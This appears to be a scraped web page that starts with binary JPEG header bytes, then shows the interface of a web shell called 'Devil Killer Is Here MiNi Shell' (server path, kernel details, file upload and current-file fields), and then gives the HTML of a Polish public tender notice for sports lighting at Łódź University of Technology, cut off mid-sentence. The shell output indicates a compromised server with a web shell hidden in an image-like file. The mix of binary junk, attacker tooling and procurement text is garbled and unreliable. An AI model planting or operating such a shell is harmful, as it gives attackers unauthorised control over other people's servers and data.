JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241022/0055756601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wymiana oświetlenia sportowego w obiekcie ACSD PŁ &#34;Zatoka Sportu&#34; w Łodzi przy Al. Politechniki 10 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Łódzka, Akademickie Centrum Sportowo-Dydaktyczne PŁ &#34; Zatoka Sportu&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Politechniki 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">93-590</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zatokasportu@info.p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zatokasportu.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana oświetlenia sportowego w obiekcie ACSD PŁ &#34;Zatoka Sportu&#34; w Łodzi przy Al. Politechniki 10 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab9e3e76-a1e9-4a87-a60a-1adea6643434</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00557566</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00058268/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Wymiana oświetlenia sportowego w obiekcie ACSD PŁ &#34;Zatoka Sportu&#34; w Łodzi przy Al. Politechniki 10</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja odbywa się za pośredn. Platformy pod adresem: https://plodz.ezamawiajacy.pl/<br/>Datą złożenia dokumentu, oświadcz. lub innego rodzaju inform. stanowiących przedmiot korespondencji (w tym wyjaśnień, wezwania, uzupełn., etc.) jest data ich złożenia/wysłania poprzez kafelek „Wiadomości” kierujący do modułu korespondencji. Zamawiający nie będzie udzielał odpowiedzi na pyt. do SWZ lub rozpatrywał wniosków dotyczących czynności podejmowanych w postęp. lub innych pism Wykon., jeżeli wnioski te lub pisma zostaną złożone w inny sposób niż za pośredn. Platformy. Wyjątek stanowi wniosek będący zgłoszeniem chęci uczestnictwa w wizji lok. (patrz: Rozdz. I ust. 5 pkt 2 SWZ) składany na adres: zatokasportu@info.p.lodz.pl<br/>Zamaw. nie przewiduje zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 PZP i komunikowania się z Wykon. w inny sposób niż przy użyciu środków komunikacji elektron. Szczegół. inform. dot. sposobu komunikacji: Rozdz. III podr.1 SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja odbywa się elektron. za pośredn. Platformy znajdującej się pod adresem: https://plodz.ezamawiajacy.pl/ poprzez kafelek<br/>„Wiadomości” kierujący do modułu korespondencji.<br/>2. W postęp. komunikacja między Zamawiającym, a Wykonawcami odbywa się wyłącznie przy użyciu Platformy. Datą złożenia dokumentu, oświadczenia lub innego rodzaju informacji stanowiących przedmiot korespondencji (w tym wyjaśnień, wezwania, uzupełnienia, etc.) jest data ich złożenia/wysłania poprzez kafelek „Wiadomości” kierujący do modułu korespondencji.<br/>Zamaw. nie będzie udzielał odpowiedzi na pytania do SWZ lub rozpatrywał wniosków dotyczących czynności podejmowanych w postępow. lub innych pism Wykonawców, jeżeli wnioski te lub pisma zostaną złożone w inny sposób niż za pośredn. Platformy (np. poprzez adres e-mail). <br/>(WYJĄTEK stanowi wniosek będący zgłoszeniem chęci uczestnictwa w wizji lokalnej -patrz: Rozdz. I ust. 5 pkt 2- składany na adres: zatokasportu@info.p.lodz.pl)<br/>3. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Politechniki Łódzkiej:<br/>https://plodz.ezamawiajacy.pl/ lub https://oneplace.marketplanet.pl<br/>4. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do str. https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”, a następnie postępuje zgodnie z poleceniami Platformy.<br/>5.Rejestracja konta następuje poprzez:<br/>-kontakt z numerem telefonu podanym w potwierdzeniu lub<br/>-jeżeli użytkownik nie skontaktuje się telefonicznie konto zostanie aktywowane w ciągu maksymalnie 6 godzin roboczych.<br/>6.Po założeniu konta Wykon. ma możliwość złożenia Oferty w postępowaniu.<br/>7. Dopuszczalny format podpisu elektronicznego:<br/>1) dokumenty w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf”, wtedy będzie wymagany oddzielny plik z podpisem. W zw. z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.<br/>8. Niezbędne wymagania sprzętowo-aplikac. umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>3) Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2<br/>4) Zainstalow. program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>9. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf , xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, PAdES, ASIC, asics, sig, XMLenc, dxf, ath, prd.<br/>10. Oferta musi być sporządz. pod rygorem nieważności, w jęz. polskim, w postaci elektronicznej, i opatrzona kwalifikow. podpisem elektron., podpisem zaufanym lub podpisem osob. (przy użyciu e-dowodu) przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji określoną w odpowiednim rejestrze lub innym dokumencie rejestrowym, właściwym dla danej formy organizacyjnej Wykonawcy.<br/>11. Sposób sporządzania i przekazywania dokumentów określony został w ROZPORZĄDZENIU PREZESA RADY MINISTRÓW z dn. 30.12.2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komun. elektron. w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j. Dz. U. z 2020 r., poz. 2452, ze zm.), zwane „Rozporządzeniem dot. komunikacji elektronicznej”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UEL 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że administratorem danych osobowych jest Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź.<br/>Szczegółowe informacje dotyczące przetwarzania danych osobowych zawiera Rozdział I ust. 17 SWZ zamieszczonej pod adresem:<br/>https://plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że administratorem danych osobowych jest Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź. <br/>Szczegółowe informacje o ograniczeniach stosowania przepisów dotyczących przetwarzania danych osobowych zawiera Rozdział I ust. 17 SWZ zamieszczonej pod adresem: https://plodz.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ACSD.262.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowi WYMIANA OŚWIETLENIA SPORTOWEGO W OBIEKCIE AKADEMICKIEGO CENTRUM SPORTOWO – DYDAKTYCZNEGO POLITECHNIKI ŁÓDZKIEJ „ZATOKA SPORTU” <br/>W ŁODZI PRZY AL. POLITECHNIKI 10.<br/><br/>Zakres przedmiotu zamówienia obejmuje wykonanie na rzecz Zamawiającego:<br/>1)	Dostawy nowych opraw do lamp zainstalowanych w hali sportowej,<br/>2)	Demontażu istniejących opraw i montażu w ich miejscu nowych wraz z integracją systemu,<br/>3)	Demontażu uszkodzonych opraw z lamp na hali basenowej i montażu w ich miejscu zdemontowanych opraw z hali sportowej.<br/><br/>Szczegółowy opis przedmiotu zamówienia określa Załącznik nr 2 do SWZ <br/>oraz udostępniony wzór umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31520000-7 - Lampy i oprawy oświetleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31530000-0 - Części lamp i sprzętu oświetleniowego</p> <p class="mb-0">31500000-1 - Urządzenia oświetleniowe i lampy elektryczne</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się<br/>następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający NIE ŻĄDA żadnych szczególnych podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.<br/>Potwierdzeniem braku podstaw wykluczenia w postępowaniu na dzień składania ofert jest oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy Pzp., które nie jest podmiotowym środkiem dowodowym i stanowi jedynie dowód potwierdzający brak podstaw wykluczenia w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>Podmiotowe środki dowodowe obejmują również oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 pkt 3-6 Ustawy oraz w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - zgodnie z załącznikami do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający NIE ŻĄDA żadnych szczególnych podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału<br/>w postępowaniu.<br/>Potwierdzeniem spełniania warunków udziału w postępowaniu na dzień składania ofert jest oświadczenie, o którym mowa w art. 125<br/>ust. 1 Ustawy Pzp, które nie jest podmiotowym środkiem dowodowym i stanowi jedynie dowód potwierdzający spełnianie warunków<br/>udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda żadnych szczególnych przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Formularz ofertowy (wg załącznika nr 3 do SWZ ) składany jest pod rygorem nieważności w języku polskim, w postaci elektronicznej i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (przy użyciu e-dowodu) przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji określoną w odpowiednim rejestrze lub innym dokumencie rejestrowym, właściwym dla danej formy organizacyjnej Wykonawcy.<br/><br/>2.	Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania; Uwaga: Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów);<br/><br/>3.	Pełnomocnictwo do złożenia oferty sporządzone pod rygorem nieważności, w postaci elektronicznej i opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (przy użyciu e-dowodu) <br/>(jeżeli w imieniu Wykonawcy działa osoba, której umocowanie nie wynika z dokumentów rejestrowych, o których mowa powyżej);<br/><br/>4.	Pełnomocnictwo dla pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia sporządzone pod rygorem nieważności, w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (przy użyciu e-dowodu)<br/>(jeżeli oferta składana jest przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia);<br/>5.	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy, zgodnie z art. 117 ust. 4 Ustawy Pzp. (jeżeli dotyczy);<br/><br/>6.	Zobowiązanie podmiotu trzeciego do udostępnienia zasobów niezbędnych Wykonawcy sporządzone pod rygorem nieważności, w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (przy użyciu e-dowodu) (jeśli dotyczy); <br/><br/>7.	Zastrzeżenie tajemnicy przedsiębiorstwa - oświadczenia i/lub dokumenty na podstawie których Zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji w postaci elektronicznej i opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (przy użyciu e-dowodu) <br/>(jeżeli Wykonawca zastrzega takie informacje)<br/><br/>8.	Wadium w oryginale w postaci elektronicznej (jeśli wadium nie zostało wniesione w formie pieniężnej) / Potwierdzenie wpłaty wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych) przed upływem terminu składania ofert. Szczegółowy sposób wniesienia wadium i jego zwrotu został opisany w Rozdziale II pkt 10 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest wnieść wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy PLN) przed upływem terminu składania ofert.<br/>Wadium może być wniesione w:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>Wadium w formie pieniądza należy wnieść przelewem na nr rachunku Zamawiającego wskazany w SWZ z dopiskiem na dokumencie:<br/><br/>Wadium do postępowania pn. WYMIANA OŚWIETLENIA SPORTOWEGO W OBIEKCIE ACSD PŁ „ZATOKA SPORTU” W ŁODZI PRZY AL. POLITECHNIKI 10 lub nr postęp. ACSD.262.2.2024<br/><br/>Jeżeli wadium jest wnoszone w formie innej niż pieniądz tj. w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/><br/>Wadium należy wnieść przed upływem terminu składania ofert. Za wadium wniesione w terminie uważa się:<br/>1) dla wadium wnoszonego w formach innych niż pieniądz – datę przesłania dokumentu na Platformę,<br/>2) dla wadium wnoszonego w pieniądzu – datę uznania rachunku bankowego przez bank Zamawiającego przed upływem terminu składania ofert (decyduje data i godzina wpływu środków na rachunek Zamawiającego).<br/><br/>Wymagania dotyczące wadium określa art. 97, 98 i art. 281 ust. 2 